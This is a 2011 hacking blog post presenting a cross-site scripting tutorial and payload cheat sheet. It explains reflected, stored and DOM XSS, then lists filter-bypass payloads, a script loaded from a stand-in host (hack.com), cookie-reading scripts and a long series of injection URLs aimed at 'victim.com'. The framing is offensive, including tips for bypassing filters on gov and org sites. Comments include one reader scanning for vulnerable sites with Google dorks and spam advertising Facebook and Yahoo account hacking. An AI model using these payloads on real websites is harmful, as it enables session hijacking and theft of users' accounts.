Cross site scripting(XSS) Cheat Sheet - Readers Choice!! ~ Hacking Alert http://hackingalert.blogspot.fr/2011/12/cross-site-scripting-cheat-sheet...

Computer Tricks and Hacks. Hacking Software and much

more ...

11:04 PM cracking, hacking, hacking tutorial, sql injection tool, xss attack
8 comments

Hello friends. These days I am on an XSS rampage. I recently posted an article on

XSS vulnerability in Babylon search. Since then I got several request from the
readers to post a quick article on cross site scriptting. This tutorial will be divided into
two parts. In the first part I will cover the basics of XSS and how the attack vector is
implemented. In the next tutorial we will discuss some techniques by which we can
prevent XSS attacks.

OWASP lists sql injection and XSS as the two most common vulnerabilities in web
pages and web apps. We have covered SQL injection quiet extensively so I decided
to write on xss.

Cross Site Scripting or XSS is a web application attack that involves injecting a
piece of malicious code into the vulnerable web application/web page. The attacker
injects a client side script mainly through the web browser to reach the other users of
the particular website. This attack can open several doors for the attacker ranging
from session hijacking to entire database compromise.

Reflected or Non-persistent XSS attack

This is the most common form of XSS attack in which the attackers crafts a
malicious code and transfers it to the server side either through the HTTP request
parameter or through some HTML form submission. A simple Reflected XSS attack
looks like this-
<script>alert(xss);</script> (Embedded Script)
<script src=http://hack.com/xss.js></script> (External script)

Consider this real time example of reflected XSS in action:

XSS vulnerability in Babylon Search

Stored or Persistent XSS attack

This attack is more dangerous and complicated compared to reflected XSS attack. In
Stored or persistent XSS attack, the vulnerable script is stored on the target server
and is activated once another user clicks on it. For example, consider a forum where
the attacker posts a message containing a link to malicious script. Another user
when views the message and clicks it, then the script activates and causes
respective attack.
The attacker can craft a malicious script like a cookie stealing script of the form
<script>alert(document.cookie);</script> and steal victims cookies to perform
session hijacking.

DOM based XSS attack

1 of 4 6/13/17, 4:47 PM
Cross site scripting(XSS) Cheat Sheet - Readers Choice!! ~ Hacking Alert http://hackingalert.blogspot.fr/2011/12/cross-site-scripting-cheat-sheet...

DOM or document object model based XSS attacks tries to exploit the structure of
the page in which they reside. The attacker tries to trick the browser to execute the
JavaScript or HTML code of his choice. Unlike the other two XSS attacks, DOM
based attack takes the advantage of vulnerable javascript which executes directly in
the users browser.
Consider the following piece of code:

var loc = document.location + '?gotoHomepage=1';

document.write('<a href="' + loc + '">Home</a>');

The javascript variable document.location can easily be compromised by the

attacker to pass a malicious javascript as it has no user input filters. A url of the form
: http://site.com/index.html?<script>alert(document.cookie)</script> can be created
and passed as the HTTP header and can be executed directly into users
document.

Complete Cheat Sheet on XSS:

<html><font color="Red"><b>Pwned</b></font></html>

<script>alert('xss')</script>

"><script>alert('xss')</script>

Bypassing Xss Simple Filteration Without Alteration:

Now we notice, the above script we used for filtration is evolving only a few strings,
knowing there are bunch of ways and
strings to inject a malicious request.
It's only filtering '< > /' means leaving hackers with a vast amount of other strings to
inject a malicious code.
Now the question is since '<' and '>' are filtered, how we will be able to send a
javascript or html code injection?
Well, the answer is quite easy, javascript can be executed using ' and " before the
orignal script.

For instance,

')alert('xss');

This will generate an alert box again on a vulnerable server.

Secondly,

");alert('xss');

This will too generate an alert box on a vulnerable server.

Bypassing Advance Xss Filtration:

Some webmasters filter lot more than this, especially it's filtered on important sites
like gov and org sites.
But all depends on their pattern if they are doing this in javascript, we will of course
just alter the page but what if the filtration is not in javascript, instead is in html or
php or even asp.
There's nothing impossible, we will try to get as much info about the filtration as
much we can.
Supposing a server that have filtered all strings just more than common in a way that
it reads the malicious string in the beginning or in the end to avoid and abort it, this
of course can be bypassed too!

An example can be likely so:

helloworld<script>alert('xss')</script>

The above script will bypass filtration for the server that reads the malicious string in
the beginning.

2 of 4 6/13/17, 4:47 PM
Cross site scripting(XSS) Cheat Sheet - Readers Choice!! ~ Hacking Alert http://hackingalert.blogspot.fr/2011/12/cross-site-scripting-cheat-sheet...

helloworld<script>alert('xss')<script>helloworld

This will bypass filtration on server that reads whether in the beginning or in the end
or at both ends!
Mostly, this kind of filtration isn't common, so cant be of much use.
Some webmasters also filter the word 'xss' so it's likely to use some other message
for making an alert.

<script>alert('hello world')</script>

This will bypass message filtration.

Now we will study some more advance filtration bypass.

Some webmasters just simply define a pattern of a cross-site scripting script that is
possibly common.

In this case, I will mention here the full array of strings to inject, bypassing the
filtration.

We will suppose injecting in a search form.

victim.com/search.php?query="><script>alert('hello world')</script>
victim.com/search.php?query="><script>alert("hello world")</script>
victim.com/search.php?query="><script>alert("hello world");</script>
victim.com/search.php?query="><script>alert(/hello world");</script>
victim.com/search.php?query=//"><script>alert(/hello world/);</script>
victim.com/search.php?query=abc<script>alert(/hello world/);</script>
victim.com/search.php?query=abc"><script>alert(/hello world/);</script>
victim.com/search.php?query=abc"></script><script>alert(/hello world/);</script>
victim.com/search.php?query=abc//abc"></script>alert(/hello world/);</script>
victim.com/search.php?query=000"><script></script><script>alert(1337);</script>
victim.com/search.php?query=000abc</script><script>alert(/1337/);</script>
victim.com/search.php?query=--<script>"></script>alert(/1337/);</script>
victim.com/search.php?query=pwned<script>document.write('abc');</script>
victim.com/search.php?query=pwned</script><script>document.write(1337);
</script>
victim.com/search.php?query=pwned')alert(1337);//
victim.com/search.php?query=pwned";)alert(1337);//
victim.com/search.php?query=pwned");alert(/pwned/);//
victim.com/search.php?query=pwned//"></script>
<script>location.href='javascript:alert(/pwned/);</script>
victim.com/search.php?query="><img src='javascript:alert('xss');'>
victim.com/search.php?query="><script src='http://malicous js'</script>

These are a few simple and advanced scripts that can be used to check for XSS
vulnerability. There are several automatic tools available as well but I would
recommend that you first learn the manual method so that you can clearly
understand the attack vector. Later on you can switch to automatic tools. In case you
know any other XSS script that is missing in this tutorial then you can add in the
comment box and I will update it in this tutorial along with your name.
Special Thanks : str0ke,USMAN,tushy,Hackman,shubham,Fix

DARKLORD!!

Newer Post Home Older Post

8 comments:

Anonymous December 12, 2011 at 4:00 PM

encoded scripts?
Reply

Prayanthem December 12, 2011 at 11:44 PM

3 of 4 6/13/17, 4:47 PM
Cross site scripting(XSS) Cheat Sheet - Readers Choice!! ~ Hacking Alert http://hackingalert.blogspot.fr/2011/12/cross-site-scripting-cheat-sheet...

Awesome that you made a tutorial about this!

I have a program that actually finds websites (using Google
dorks) that has XSS and SQL vulnerabilities, so easy to test
this out these different methods.

Thank you for sharing, fine sir.

Reply

abhinav singh December 13, 2011 at 10:26 AM

thnks man.. :)
Reply

RaviTeja December 18, 2011 at 1:01 PM

Y don't u place ads ??
Reply

abhinav singh December 18, 2011 at 1:27 PM

@RaviTejai did place add once..but some cyber criminals of
neighbouring country started making fraud clicks on it due to
which my adsense accnt got disabled :( .. but now I am planning
to start again..i hav some affiliate offers.
Reply

crackon June 7, 2013 at 11:26 AM

hack yahoo mail password free, click here
Reply

crackon June 7, 2013 at 11:30 AM

.you must got a real facebook hacker hear

http://hackxfbx.blogspot.in/

OR

do u wand a real facebook hacker pls click hear

hack your friend fb account software free download

Reply

crackon June 7, 2013 at 11:31 AM

hack yahoo mail password free, click here
Reply

Comment as:

Publish

Newer Post Home Older Post

Copyright 2011 Hacking Alert | Blog owned by Hackmeout Inc.

4 of 4 6/13/17, 4:47 PM